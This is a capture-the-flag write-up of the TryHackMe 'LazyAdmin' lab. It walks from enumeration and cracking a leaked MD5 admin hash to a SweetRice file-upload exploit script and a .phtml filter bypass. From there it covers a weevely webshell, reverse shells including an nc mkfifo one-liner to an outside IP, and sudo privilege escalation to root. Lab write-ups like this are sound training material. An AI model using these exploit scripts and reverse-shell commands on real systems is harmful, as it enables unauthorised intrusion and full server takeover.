---
layout: post
title: "LazyAdmin - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - linux
  - eop
  - sudo
  - php
date: 2021/04/01 20:21:00
thumbnail: /images/TryHackMe/lazyadmin.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** LazyAdmin
- **Profile:** [tryhackme.com](https://tryhackme.com/room/lazyadmin)
- **Difficulty:** Easy
- **Description**: Easy linux machine to practice your skills

![LazyAdmin](/images/TryHackMe/lazyadmin.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf exploitdb john weevely pwncat
```

## Network enumeration

Service scan with nmap:

```plaintext
# Nmap 7.91 scan initiated Mon Mar 22 17:29:52 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.206.27
Nmap scan report for 10.10.206.27
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 22 17:34:28 2021 -- 1 IP address (1 host up) scanned in 275.92 seconds
```

## Web enumeration

Only an Apache httpd default page is displayed, let's find if there is a web app
deployed on a sub-directory or hidden files.

```plaintext
$ ffuf -u http://10.10.206.27/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
# nothing

$ ffuf -u http://10.10.206.27/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -fc 403
...
content                 [Status: 301, Size: 314, Words: 20, Lines: 10]
```

So browsing at `/content/` we can see a page of [Basic CMS SweetRice](http://www.basic-cms.org/).

We can quickly browse the [source repository](https://github.com/sweetrice/SweetRice) to
discover the architecture. I notice a `changelog.txt` file.

So browsing `/content/changelog.txt` tells us it should be version 1.5.0 or 1.5.1.

## Web exploitation

The identified version should be vulnerable:

```plaintext
$ searchsploit sweetrice 1.5
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
SweetRice 1.5.1 - Arbitrary File Download                                           | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                             | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                 | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                   | php/webapps/40700.html
SweetRice 1.5.1 - Cross-Site Request Forgery                                        | php/webapps/40692.html
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

EDB-ID-40718 is showing an easy to exploit backup disclosure.

We can directly download `/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql`.

We can find an INSERT statement containing a serialized PHP object.

```sql
INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');
```

Inside the configuration we can find the admin account `manager` / `42f749ade7f9e195bf475f37a44cafcb` (hash).

With [haiti](https://github.com/noraj/haiti) we can find that the hash is probably MD5.
Let's hope it's not salted.

```
$ haiti 42f749ade7f9e195bf475f37a44cafcb
MD2 [JtR: md2]
MD5 [HC: 0] [JtR: raw-md5]
MD4 [HC: 900] [JtR: raw-md4]
Double MD5 [HC: 2600]
...
```

Let's crack it with JtR:

```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123      (manager)
1g 0:00:00:00 DONE (2021-04-01 09:45) 100.0g/s 3360Kp/s 3360Kc/s 3360KC/s classof2011..181187
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```

By looking again at the source code Guthub repository we can see that the code
is stored in `as` folder. So on the website we need to browse to `/content/as/`
and are facing a login page.

We can use the authenticated file upload exploit. I modified it because the original exploit
was awful.

```
$ cp /usr/share/exploitdb/exploits/php/webapps/40716.py .
```

```python
#/usr/bin/python
#-*- Coding: utf-8 -*-

import requests
import os
from requests import session

root_url = 'http://10.10.111.242/content'
username = 'manager'
password = 'Password123'
filename = '/home/noraj/Documents/challs/THM/lazyadmin/agent.php'
file = {'upload[]': open(filename, 'rb')}

payload = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}

with session() as r:
    login = r.post(root_url + '/as/?type=signin', data=payload)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if login.text.find(success) > 1:
            print("[+] Login Succssfully...")
        else:
            print("[-] User or Pass is incorrent...")
            print("Good Bye...")
            exit()
            pass
        pass
    uploadfile = r.post(root_url + '/as/?type=media_center&mode=upload', files=file)
    if uploadfile.status_code == 200:
        print("[+] File Uploaded...")
        print("[+] URL : " + root_url + "/attachment/" + os.path.basename(filename))
        pass
```

It seems ot work but the file is not uploaded:

```
$ python 40716.py
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.111.242/content/attachment/agent.php
```

When trying again with a PNG again it works so the `.php` extension must be blocked.

Using the `.phtml` extension let us bypass the filter.

Now we can use our webshell:

```
$ weevely http://10.10.111.242/content/attachment/agent.phtml noraj

[+] weevely 4.0.1

[+] Target:     10.10.111.242
[+] Session:    /home/noraj/.weevely/sessions/10.10.111.242/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Let's deploy a reverse shell now:

```
www-data@THM-Chal:/var/www/html/content/attachment $ :backdoor_reversetcp -shell /bin/bash -vector python_pty 10.9.19.77 7777
```

```
$ pwncat -lvv 7777
INFO: Listening on :::7777 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:7777 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.111.242:57284 (family 2/IPv4, TCP)
www-data@THM-Chal:/var/www/html/content/attachment$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## System enumeration

There is a readable home directory.

```
www-data@THM-Chal:/$ ls -lhA /home/itguy
total 140K
-rw-------  1 itguy itguy 1.6K Nov 30  2019 .ICEauthority
-rw-------  1 itguy itguy   53 Nov 30  2019 .Xauthority
lrwxrwxrwx  1 root  root     9 Nov 29  2019 .bash_history -> /dev/null
-rw-r--r--  1 itguy itguy  220 Nov 29  2019 .bash_logout
-rw-r--r--  1 itguy itguy 3.7K Nov 29  2019 .bashrc
drwx------ 13 itguy itguy 4.0K Nov 29  2019 .cache
drwx------ 14 itguy itguy 4.0K Nov 29  2019 .config
drwx------  3 itguy itguy 4.0K Nov 29  2019 .dbus
-rw-r--r--  1 itguy itguy   25 Nov 29  2019 .dmrc
drwx------  2 itguy itguy 4.0K Nov 29  2019 .gconf
drwx------  3 itguy itguy 4.0K Nov 30  2019 .gnupg
drwx------  3 itguy itguy 4.0K Nov 29  2019 .local
drwx------  5 itguy itguy 4.0K Nov 29  2019 .mozilla
-rw-------  1 itguy itguy  149 Nov 29  2019 .mysql_history
drwxrwxr-x  2 itguy itguy 4.0K Nov 29  2019 .nano
-rw-r--r--  1 itguy itguy  655 Nov 29  2019 .profile
-rw-r--r--  1 itguy itguy    0 Nov 29  2019 .sudo_as_admin_successful
-rw-r-----  1 itguy itguy    5 Nov 30  2019 .vboxclient-clipboard.pid
-rw-r-----  1 itguy itguy    5 Nov 30  2019 .vboxclient-display.pid
-rw-r-----  1 itguy itguy    5 Nov 30  2019 .vboxclient-draganddrop.pid
-rw-r-----  1 itguy itguy    5 Nov 30  2019 .vboxclient-seamless.pid
-rw-------  1 itguy itguy   82 Nov 30  2019 .xsession-errors
-rw-------  1 itguy itguy   82 Nov 29  2019 .xsession-errors.old
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Desktop
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Documents
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Downloads
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Music
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Pictures
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Public
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Templates
drwxr-xr-x  2 itguy itguy 4.0K Nov 29  2019 Videos
-rw-r--r-x  1 root  root    47 Nov 29  2019 backup.pl
-rw-r--r--  1 itguy itguy 8.8K Nov 29  2019 examples.desktop
-rw-rw-r--  1 itguy itguy   16 Nov 29  2019 mysql_login.txt
-rw-rw-r--  1 itguy itguy   38 Nov 29  2019 user.txt
```

There are several interesting files:

- the user flag
- some mysql credentials
- a backup script in Perl

```
www-data@THM-Chal:/home/itguy$ cat user.txt
THM{REDACTED}

www-data@THM-Chal:/home/itguy$ cat mysql_login.txt
rice:randompass

www-data@THM-Chal:/home/itguy$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
```

`/etc/copy.sh` contains a reverse shell and is writable by everyone:

```
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

www-data@THM-Chal:/home/itguy$ ls -lh /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
```

My guess is that it may be used in a privileged cron script but first I want to check
the MySQL DB.

```
www-data@THM-Chal:/home/itguy$ mysql -u rice -p
Enter password: randompass

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 46
Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```

After a bit of digging I concluded there was nothing useful on the DB.

## EoP

Going back to the backup script it seems it's not used by a cron task but we
can use it directly via sudo:

```
www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```

We have just to modify `/etc/copy.sh` and execute the backup script as root:

```
www-data@THM-Chal:/home/itguy$ echo '/bin/bash -i' > /etc/copy.sh
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
root@THM-Chal:/# id
uid=0(root) gid=0(root) groups=0(root)
```
